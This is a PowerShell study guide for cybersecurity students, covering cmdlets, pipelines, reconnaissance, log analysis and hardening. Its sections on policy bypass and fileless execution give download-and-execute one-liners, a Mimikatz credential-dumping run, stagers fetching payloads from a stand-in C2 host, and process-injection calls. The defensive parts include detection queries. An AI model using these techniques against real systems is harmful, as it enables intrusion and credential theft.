PowerShell Bible

Study Materials for Cybersecurity Students

Table of Contents

1. Introduction to PowerShell

2. Getting Started

3. Essential PowerShell Fundamentals

4. Core Commands for Cybersecurity

5. Variables and Data Types

6. Working with Objects and Pipelines

7. Security Policies and Bypasses

8. File System Operations

9. Network and System Information

10. Practical Cybersecurity Examples

11. Fileless Execution & In-Memory Operations

12. Common Pitfalls and Best Practices

13. Quick Reference

14. Glossary

1. Introduction to PowerShell

PowerShell is a powerful command-line shell and scripting language built on the .NET framework. Unlike traditional command-line interfaces that work with text, PowerShell works with objects, making it incredibly powerful for system administration and cybersecurity tasks.

Why PowerShell Matters in Cybersecurity

• System Administration: Manage Windows systems, users, and services

• Incident Response: Quickly gather system information and analyze threats

• Penetration Testing: Perform reconnaissance and exploitation tasks

• Automation: Automate repetitive security tasks and monitoring

• Forensics: Collect and analyze digital evidence

Key Features

• Object-oriented: Works with .NET objects, not just text

• Cross-platform: Available on Windows, Linux, and macOS

• Extensible: Thousands of built-in commands (cmdlets)

• Integrated: Deep integration with Windows and .NET ecosystem

2. Getting Started

Installation and Access

Windows:

• PowerShell 5.1 comes pre-installed on Windows 10/11

• PowerShell 7+ can be installed via: winget install Microsoft.PowerShell

Linux/macOS:

# Linux
curl -sSL https://aka.ms/install-powershell.sh | bash

# macOS
brew install --cask powershell

Launching PowerShell

• Windows PowerShell: powershell.exe

• PowerShell Core/7+: pwsh.exe

• As Administrator: Right-click → "Run as Administrator"

Basic Interface

PS C:\Users\Student> # This is the PowerShell prompt
# PS = PowerShell
# C:\Users\Student = Current directory
# > = Ready for input

3. Essential PowerShell Fundamentals

Understanding Cmdlets

PowerShell commands are called "cmdlets" and follow a Verb-Noun pattern:

Get-Process      # Get information about processes
Stop-Service     # Stop a Windows service
Set-Location     # Change directory

Common Verbs

• Get: Retrieve information

• Set: Modify settings

• Start/Stop: Control services/processes

• New: Create new objects

• Remove: Delete objects

• Test: Verify conditions

Getting Help

The help system is your best friend:

Get-Help Get-Process                    # Basic help
Get-Help Get-Process -Examples          # Show examples
Get-Help Get-Process -Detailed          # Detailed help
Get-Help Get-Process -Full              # Complete help
Get-Help *process*                      # Find commands with "process"

Discovering Commands

Get-Command                             # List all commands
Get-Command *service*                   # Find service-related commands
Get-Command -Verb Get                   # All commands that "get" things
Get-Command -Noun Process               # All process-related commands

4. Core Commands for Cybersecurity

System Information Commands

Get-ComputerInfo - Comprehensive system information

Get-ComputerInfo | Select-Object WindowsProductName, TotalPhysicalMemory, CsProcessors

Get-WmiObject - Windows Management Instrumentation queries

Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_LogicalDisk

Get-CimInstance - Modern replacement for Get-WmiObject

Get-CimInstance -ClassName Win32_Process
Get-CimInstance -ClassName Win32_Service

Process and Service Management

Get-Process - List running processes

Get-Process                             # All processes
Get-Process -Name "chrome"              # Specific process
Get-Process | Where-Object {$_.CPU -gt 100}  # High CPU processes

Get-Service - Manage Windows services

Get-Service                             # All services
Get-Service -Name "win*"                # Services starting with "win"
Get-Service | Where-Object {$_.Status -eq "Running"}

Network Commands

Test-NetConnection - Network connectivity testing

Test-NetConnection google.com           # Basic connectivity
Test-NetConnection google.com -Port 443 # Test specific port

Get-NetTCPConnection - Active network connections

Get-NetTCPConnection -State Established # Active connections
Get-NetTCPConnection -LocalPort 80      # Connections on port 80

Resolve-DnsName - DNS resolution

Resolve-DnsName google.com              # Resolve domain
Resolve-DnsName 8.8.8.8                 # Reverse DNS lookup

5. Variables and Data Types

Basic Variables

Variables in PowerShell start with $:

$name = "Student"
$age = 25
$isAdmin = $true
$servers = @("web01", "db01", "mail01")

Automatic Variables

PowerShell provides many built-in variables:

$env:USERNAME                           # Current username
$env:COMPUTERNAME                       # Computer name
$env:PATH                               # System PATH
$PWD                                    # Current directory
$?                                      # Last command success status
$Error                                  # Array of recent errors

Environment Variables

Access system environment variables:

$env:TEMP                               # Temporary directory
$env:USERPROFILE                        # User profile directory
$env:PROGRAMFILES                       # Program Files directory

# List all environment variables
Get-ChildItem Env:

Arrays and Hash Tables

# Arrays
$ports = @(80, 443, 22, 3389)
$ports[0]                               # First element (80)
$ports[-1]                              # Last element (3389)

# Hash tables (key-value pairs)
$serverInfo = @{
    Name = "WebServer01"
    IP = "192.168.1.100"
    OS = "Windows Server 2019"
}
$serverInfo.Name                        # Access by key
$serverInfo["IP"]                       # Alternative syntax

6. Working with Objects and Pipelines

The Pipeline

PowerShell's pipeline (|) passes objects between commands:

Get-Process | Where-Object {$_.CPU -gt 50} | Sort-Object CPU -Descending

This command:

1. Gets all processes

2. Filters for high CPU usage

3. Sorts by CPU usage (highest first)

Object Properties and Methods

Explore object structure with Get-Member:

Get-Process | Get-Member                # Show available properties/methods
Get-Service | Get-Member -MemberType Property  # Only properties

Selecting and Filtering

Select-Object - Choose specific properties

Get-Process | Select-Object Name, CPU, WorkingSet
Get-Process | Select-Object -First 5   # First 5 processes

Where-Object - Filter objects

Get-Service | Where-Object {$_.Status -eq "Running"}
Get-Process | Where-Object {$_.ProcessName -like "*chrome*"}

Sort-Object - Sort results

Get-Process | Sort-Object CPU -Descending
Get-Service | Sort-Object Name

7. Security Policies and Bypasses

Understanding Execution Policy

PowerShell's execution policy controls script execution:

• Restricted: No scripts allowed (default on Windows desktop)

• RemoteSigned: Local scripts OK, remote scripts must be signed

• AllSigned: All scripts must be signed

• Unrestricted: All scripts allowed (default on Linux/macOS)

• Bypass: No restrictions or warnings

Checking Current Policy

Get-ExecutionPolicy                     # Current policy
Get-ExecutionPolicy -List               # All scopes

Bypassing Execution Policy

⚠️ Important: These techniques are for educational and legitimate testing purposes only.

Method 1: Temporary bypass for current session

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

Method 2: Command-line bypass

powershell.exe -ExecutionPolicy Bypass -File script.ps1

Method 3: Download and execute

IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')
# Or shorter:
iex (iwr http://example.com/script.ps1 -UseBasicParsing).Content

Method 4: Encode and execute

$command = "Get-Process"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

Zone Identifier and Unblocking Files

Windows marks downloaded files as potentially unsafe:

# Check if file is blocked
Get-Item script.ps1 -Stream *
Get-Content script.ps1 -Stream Zone.Identifier

# Unblock file
Unblock-File script.ps1

# Unblock all files in directory
Get-ChildItem -Recurse | Unblock-File

8. File System Operations

Navigation and Listing

Get-Location                            # Current directory (pwd)
Set-Location C:\Windows                 # Change directory (cd)
Get-ChildItem                           # List files (ls/dir)
Get-ChildItem -Recurse                  # Recursive listing
Get-ChildItem -Hidden                   # Show hidden files
Get-ChildItem -Force                    # Show all files including system

File Operations

# Create files and directories
New-Item -ItemType File -Name "test.txt"
New-Item -ItemType Directory -Name "TestFolder"

# Copy, move, remove
Copy-Item source.txt destination.txt
Move-Item oldname.txt newname.txt
Remove-Item unwanted.txt

# Read file content
Get-Content file.txt
Get-Content file.txt -Tail 10          # Last 10 lines
Get-Content file.txt | Select-String "error"  # Search for text

File Properties and Permissions

# File properties
Get-ItemProperty file.txt
Get-ChildItem | Select-Object Name, Length, LastWriteTime

# File permissions (Windows)
Get-Acl file.txt
Get-Acl C:\Windows | Format-List

# Find files by criteria
Get-ChildItem -Recurse -Name "*.log"
Get-ChildItem -Recurse | Where-Object {$_.Length -gt 1MB}

Alternate Data Streams (Windows)

# List all streams
Get-Item file.txt -Stream *

# Create hidden data stream
Set-Content -Path file.txt -Stream "Hidden" -Value "Secret data"

# Read from stream
Get-Content -Path file.txt -Stream "Hidden"

9. Network and System Information

Network Configuration

# Network adapters
Get-NetAdapter
Get-NetIPConfiguration

# IP addresses
Get-NetIPAddress
Get-NetIPAddress -AddressFamily IPv4

# Routing table
Get-NetRoute

Network Connectivity

# Ping equivalent
Test-Connection google.com
Test-Connection -ComputerName google.com -Count 2

# Port testing
Test-NetConnection google.com -Port 443
Test-NetConnection -ComputerName 192.168.1.1 -Port 22

# DNS queries
Resolve-DnsName google.com
Resolve-DnsName google.com -Type MX    # Mail servers

System Monitoring

# Event logs
Get-EventLog -LogName System -Newest 10
Get-WinEvent -LogName Security -MaxEvents 5

# Performance counters
Get-Counter "\Processor(_Total)\% Processor Time"
Get-Counter "\Memory\Available MBytes"

# Scheduled tasks
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.State -eq "Running"}

User and Group Information

# Local users
Get-LocalUser
Get-LocalUser -Name "Administrator"

# Local groups
Get-LocalGroup
Get-LocalGroupMember -Group "Administrators"

# Current user context
whoami
[System.Security.Principal.WindowsIdentity]::GetCurrent()

10. Practical Cybersecurity Examples

Example 1: System Reconnaissance

# Gather basic system information
$info = @{
    ComputerName = $env:COMPUTERNAME
    Username = $env:USERNAME
    OS = (Get-CimInstance Win32_OperatingSystem).Caption
    Architecture = (Get-CimInstance Win32_OperatingSystem).OSArchitecture
    Domain = (Get-CimInstance Win32_ComputerSystem).Domain
    LastBoot = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
}
$info | ConvertTo-Json

Example 2: Network Port Scanning

# Simple port scanner
function Test-Port {
    param($ComputerName, $Port)
    $timeout = 1000
    $tcp = New-Object System.Net.Sockets.TcpClient
    $connect = $tcp.BeginConnect($ComputerName, $Port, $null, $null)
    $wait = $connect.AsyncWaitHandle.WaitOne($timeout, $false)
    if ($wait) {
        try {
            $tcp.EndConnect($connect)
            $tcp.Close()
            return $true
        } catch {
            return $false
        }
    } else {
        return $false
    }
}

# Scan common ports at your localhost
$commonPorts = @(21, 22, 23, 25, 53, 80, 110, 135, 143, 443, 445, 993, 995, 3389, 8000)
foreach ($port in $commonPorts) {
    if (Test-Port -ComputerName "127.0.0.1" -Port $port) {
        Write-Host "Port $port is open" -ForegroundColor Green
    }
}

Example 3: Log Analysis

# Analyze failed login attempts
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} -MaxEvents 50 |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        [PSCustomObject]@{
            Time = $_.TimeCreated
            Account = $xml.Event.EventData.Data[5].'#text'
            SourceIP = $xml.Event.EventData.Data[19].'#text'
            Reason = $xml.Event.EventData.Data[8].'#text'
        }
    } | Group-Object Account | Sort-Object Count -Descending

Example 4: Process Monitoring

# Monitor for suspicious processes
$suspiciousProcesses = @("nc.exe", "ncat.exe", "netcat.exe", "mimikatz.exe")
while ($true) {
    $runningProcesses = Get-Process | Select-Object -ExpandProperty ProcessName
    foreach ($suspicious in $suspiciousProcesses) {
        if ($runningProcesses -contains $suspicious.Replace(".exe", "")) {
            Write-Warning "Suspicious process detected: $suspicious"
            # Log or take action here
        }
    }
    Start-Sleep -Seconds 10
}

11. Fileless Execution & In-Memory Operations

Fileless execution and in-memory operations are critical techniques in modern cybersecurity, used by both attackers and security professionals. These methods allow code execution without writing files to disk, making detection more challenging and leaving minimal forensic traces.

Understanding Fileless Execution

Fileless execution refers to running code directly in memory without creating files on the target system's hard drive. This technique:

• Evades file-based detection: Traditional antivirus solutions scan files on disk

• Reduces forensic footprint: No persistent artifacts left behind

• Leverages legitimate tools: Uses built-in system utilities like PowerShell

• Enables living-off-the-land: Utilizes existing system capabilities

Core Concepts

Memory-based execution works by:

1. Downloading code/binaries directly into system memory

2. Loading and executing the code from memory

3. Avoiding disk writes that could trigger security alerts

4. Using reflection and .NET capabilities for execution

PowerShell Commands for Memory Operations

Invoke-WebRequest (iwr)

Downloads content directly into memory:

# Basic web request - stores response in memory
$response = Invoke-WebRequest -Uri "https://example.com/script.ps1"
$content = $response.Content

# Download and execute in one line
IEX (Invoke-WebRequest -Uri "https://example.com/script.ps1" -UseBasicParsing).Content

# With error handling
try {
    $script = (Invoke-WebRequest -Uri "https://example.com/payload.ps1" -UseBasicParsing).Content
    Invoke-Expression $script
} catch {
    Write-Error "Download failed: $_"
}

Invoke-RestMethod (irm)

Simplified method for REST API calls:

# Download and execute PowerShell script
Invoke-RestMethod -Uri "https://example.com/script.ps1" | Invoke-Expression

# Download binary data
$binaryData = Invoke-RestMethod -Uri "https://example.com/payload.exe"

.NET WebClient Class

Lower-level approach using .NET directly:

# Create WebClient object
$webClient = New-Object System.Net.WebClient

# Download string content
$script = $webClient.DownloadString("https://example.com/script.ps1")
Invoke-Expression $script

# Download binary data
$binaryData = $webClient.DownloadData("https://example.com/payload.exe")

# Clean up
$webClient.Dispose()

In-Memory Binary Execution Techniques

Reflection-Based Loading

Using .NET reflection to load assemblies in memory:

# Load assembly from byte array
$assemblyBytes = [System.Convert]::FromBase64String($base64Assembly)
$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)

# Get entry point and invoke
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @())

PowerShell Runspaces

Creating isolated execution environments:

# Create runspace
$runspace = [runspacefactory]::CreateRunspace()
$runspace.Open()

# Create PowerShell instance
$powershell = [powershell]::Create()
$powershell.Runspace = $runspace

# Add script and execute
$powershell.AddScript($downloadedScript)
$result = $powershell.Invoke()

# Clean up
$powershell.Dispose()
$runspace.Close()

Practical Examples

Example 1: Mimikatz in Memory

Educational Purpose: Understanding credential extraction techniques

# WARNING: This is for educational/authorized testing only
# Download Mimikatz PowerShell version (Invoke-Mimikatz)
$mimikatzUrl = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"

# Method 1: Direct execution
IEX (New-Object Net.WebClient).DownloadString($mimikatzUrl)
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

# Method 2: With variable storage
$mimikatz = (New-Object Net.WebClient).DownloadString($mimikatzUrl)
Invoke-Expression $mimikatz
Invoke-Mimikatz -DumpCreds

Example 2: PowerShell Empire Style

Red Team Technique: Stager-based execution

# Empire-style stager (simplified example)
$stager = @"
`$wc = New-Object System.Net.WebClient;
`$wc.Headers.Add('User-Agent', 'Mozilla/5.0');
`$data = `$wc.DownloadData('https://c2server.com/stage2');
`$assembly = [System.Reflection.Assembly]::Load(`$data);
`$assembly.EntryPoint.Invoke(`$null, @());
"@

# Execute stager
Invoke-Expression $stager

Example 3: Cobalt Strike Beacon Style

Advanced Persistent Threat Simulation:

# Beacon-style payload loader
function Load-Beacon {
    param([string]$Url, [string]$Key)
    
    # Download encrypted payload
    $encryptedData = (New-Object Net.WebClient).DownloadData($Url)
    
    # Decrypt payload (simplified)
    $decryptedData = Decrypt-Data $encryptedData $Key
    
    # Load and execute
    $assembly = [Reflection.Assembly]::Load($decryptedData)
    $assembly.EntryPoint.Invoke($null, @())
}

Example 4: Script Block Execution

Dynamic Code Execution:

# Download and execute script block
$scriptBlock = [ScriptBlock]::Create((iwr "https://example.com/payload.ps1").Content)
& $scriptBlock

# With parameters
$scriptBlock = [ScriptBlock]::Create($downloadedScript)
& $scriptBlock -Parameter1 "value1" -Parameter2 "value2"

Advanced Techniques

Process Injection

Injecting code into existing processes:

# Get target process
$targetProcess = Get-Process -Name "notepad"

# Allocate memory in target process
$memoryAddress = [Win32API]::VirtualAllocEx($targetProcess.Handle, 0, $payloadSize, 0x3000, 0x40)

# Write payload to allocated memory
[Win32API]::WriteProcessMemory($targetProcess.Handle, $memoryAddress, $payload, $payloadSize, 0)

# Create remote thread to execute payload
[Win32API]::CreateRemoteThread($targetProcess.Handle, 0, 0, $memoryAddress, 0, 0, 0)

DLL Reflection

Loading DLLs without file system interaction:

# Load DLL from memory
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class DLLLoader {
    [DllImport("kernel32.dll")]
    public static extern IntPtr LoadLibrary(string dllToLoad);
    
    [DllImport("kernel32.dll")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
}
"@

# Use reflection to call DLL functions
$dllHandle = [DLLLoader]::LoadLibrary("advapi32.dll")
$procAddress = [DLLLoader]::GetProcAddress($dllHandle, "LogonUserA")

Detection and Mitigation Strategies

Detection Methods

PowerShell Logging:

# Enable PowerShell script block logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell transcription
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1

Behavioral Monitoring:

• Monitor for suspicious network connections

• Track unusual process relationships

• Analyze memory usage patterns

• Watch for encoded command execution

Command Line Analysis:

# Detect suspicious PowerShell usage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | 
Where-Object {$_.Message -match "(DownloadString|Invoke-Expression|FromBase64String)"}

Mitigation Strategies

PowerShell Security Features:

# Set restrictive execution policy
Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope LocalMachine

# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

# Use Application Control (WDAC/AppLocker)
# Block unsigned PowerShell scripts

Network Security:

• Implement DNS filtering

• Monitor outbound connections

• Use proxy servers with content inspection

• Deploy network segmentation

Endpoint Protection:

• Enable Windows Defender Application Guard

• Use behavior-based detection tools

• Implement endpoint detection and response (EDR)

• Deploy application whitelisting

System Hardening:

# Disable PowerShell v2 (legacy version)
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root

# Remove PowerShell ISE if not needed
Get-WindowsCapability -Online | Where-Object Name -like "*PowerShell.ISE*" | Remove-WindowsCapability -Online

# Configure Windows Event Forwarding for centralized logging
wecutil qc

12. Common Pitfalls and Best Practices

Common Pitfalls

1. Not Understanding the Pipeline

   • Remember: PowerShell passes objects, not text

   • Use Get-Member to understand object structure

2. Ignoring Execution Policy

   • Always check execution policy in new environments

   • Understand the security implications of bypasses

3. Not Using Proper Error Handling

   # Bad
   Get-Process -Name "nonexistent"
   
   # Good
   try {
       Get-Process -Name "nonexistent" -ErrorAction Stop
   } catch {
       Write-Warning "Process not found: $_"
   }

4. Forgetting About Case Sensitivity

   • PowerShell is generally case-insensitive

   • But some operators have case-sensitive variants (-ceq, -clike)

Best Practices

1. Use Full Cmdlet Names in Scripts

   # Good for scripts
   Get-ChildItem | Where-Object {$_.Length -gt 1MB}
   
   # OK for interactive use
   gci | ? {$_.Length -gt 1MB}

2. Always Test with -WhatIf

   Remove-Item *.log -WhatIf  # See what would be deleted

3. Use Proper Parameter Names

   # Good
   Get-Process -Name "chrome"
   
   # Avoid
   Get-Process chrome

4. Handle Errors Appropriately

   Get-Service -Name "NonExistent" -ErrorAction SilentlyContinue

5. Use Comments and Documentation

   # Get all running services related to Windows Update
   Get-Service -Name "*update*" | Where-Object {$_.Status -eq "Running"}

13. Quick Reference

Essential Cmdlets

Command	Purpose	Example
Get-Help	Get help for commands	Get-Help Get-Process
Get-Command	Find commands	Get-Command *service*
Get-Member	Explore objects	Get-Process | Get-Member
Get-Process	List processes	Get-Process -Name chrome
Get-Service	List services	Get-Service -Name win*
Get-ChildItem	List files/folders	Get-ChildItem -Recurse
Test-Connection	Ping hosts	Test-Connection google.com
Invoke-WebRequest	Web requests	Invoke-WebRequest http://example.com

Common Aliases

Alias	Full Command	Purpose
ls, dir, gci	Get-ChildItem	List files
cd, sl	Set-Location	Change directory
pwd, gl	Get-Location	Show current directory
cat, gc, type	Get-Content	Read file content
ps, gps	Get-Process	List processes
gsv	Get-Service	List services
iwr	Invoke-WebRequest	Web request
iex	Invoke-Expression	Execute string as command

Operators

Operator	Purpose	Example
-eq	Equal	$a -eq $b
-ne	Not equal	$a -ne $b
-gt	Greater than	$a -gt 5
-lt	Less than	$a -lt 10
-like	Wildcard match	$name -like "*admin*"
-match	Regex match	$text -match "\d+"
-contains	Array contains	$array -contains "value"
-and	Logical AND	($a -gt 5) -and ($b -lt 10)
-or	Logical OR	($a -eq 1) -or ($b -eq 2)

14. Glossary

Cmdlet: A PowerShell command that follows the Verb-Noun naming convention.

Pipeline: The mechanism that passes objects from one command to another using the | operator.

Object: A data structure that contains both data (properties) and functions (methods).

Parameter: An input to a cmdlet that modifies its behavior.

Alias: A shorter name for a cmdlet (e.g., ls for Get-ChildItem).

Execution Policy: A security feature that controls which PowerShell scripts can run.

Provider: A PowerShell component that provides access to data stores (file system, registry, etc.).

Module: A package of PowerShell functionality that can be imported and used.

Script Block: A collection of PowerShell statements enclosed in braces {}.

WMI/CIM: Windows Management Instrumentation - a framework for managing Windows systems.

Splatting: A technique for passing parameters to cmdlets using hash tables.

Alternate Data Stream: A feature of NTFS that allows multiple data streams per file.

15. Additional Resources

• Official Documentation: https://docs.microsoft.com/powershell/

• PowerShell Gallery: https://www.powershellgallery.com/

• Community Forums: https://reddit.com/r/PowerShell

• Security Focus: https://github.com/PowerShellMafia/PowerSploit

Remember: With great power comes great responsibility. Use PowerShell ethically and in accordance with your organization's policies and applicable laws.

---

PowerShell Bible for Cybersecurity Students - Version 1.0 Created for educational purposes by TryHard3r